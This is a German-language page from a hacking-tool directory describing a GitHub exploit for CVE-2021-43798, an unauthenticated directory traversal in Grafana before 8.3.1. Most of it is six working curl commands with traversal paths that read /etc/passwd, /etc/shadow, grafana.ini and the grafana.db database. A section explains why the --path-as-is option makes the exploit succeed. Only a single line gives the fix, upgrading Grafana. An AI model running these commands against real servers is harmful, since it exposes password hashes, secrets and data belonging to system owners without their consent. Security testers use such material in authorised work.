Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/malekalthubiany/cve-2021-43798
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

Exploit für CVE-2021-43798, eine Grafana-Verzeichnisdurchlauf-Schwachstelle, die nicht authentifizierte beliebige Dateiauslesungen mittels präparierter curl-Befehle ermöglicht.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Grafana CVE-2021-43798 Exploit

Übersicht

Dieses Repository demonstriert die Ausnutzung von CVE-2021-43798, einer Directory-Traversal-Schwachstelle in Grafana. Diese Schwachstelle erlaubt es Angreifern, beliebige Dateien auf dem Server zu lesen.

CVE-Details

  • CVE: CVE-2021-43798
  • Beschreibung: Directory-Traversal-Schwachstelle in Grafana-Versionen vor 8.3.1.
  • Auswirkung: Erlaubt nicht authentifizierten Angreifern, beliebige Dateien auf dem Server zu lesen.

Voraussetzungen

  • Eine anfällige Version von Grafana (vor 8.3.1) läuft
  • Zugriff auf die Ziel-Grafana-Instanz

Ausnutzung

Verwendung von curl

Um die Schwachstelle manuell auszunutzen, können Sie einen der folgenden curl-Befehle verwenden, um zu versuchen, sensible Dateien zu lesen:

root@kitploit:~
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

Warum --path-as-is?

Im Zusammenhang mit der Ausnutzung der Grafana CVE-2021-43798 Directory-Traversal-Schwachstelle ist die Option --path-as-is unerlässlich, da sie es ermöglicht, die speziell konstruierten Traversal-Sequenzen (../../../../../) ohne Änderung direkt an den Server zu senden. Dies kann dazu führen, dass auf sensible Dateien auf dem Server zugegriffen wird, die sich außerhalb des vorgesehenen Verzeichnisses befinden.

Ohne --path-as-is würde curl den Pfad möglicherweise zu etwas wie /public/plugins/Users/install.txt normalisieren, was die Schwachstelle nicht ausnutzen würde. Durch die Verwendung von --path-as-is bleibt die genaue Traversal-Sequenz erhalten, sodass der Exploit erfolgreich ist.

Dokumentationshinweis

Weitere Details zur Option --path-as-is finden Sie in der curl-Dokumentation. Durch das Verständnis und die Nutzung von --path-as-is können Sicherheitsexperten und Forscher Directory-Traversal-Schwachstellen in Webanwendungen effektiv demonstrieren und testen.

Abhilfe

Um diese Schwachstelle zu beheben, aktualisieren Sie Grafana auf Version 8.3.1 oder höher.

Tool herunterladen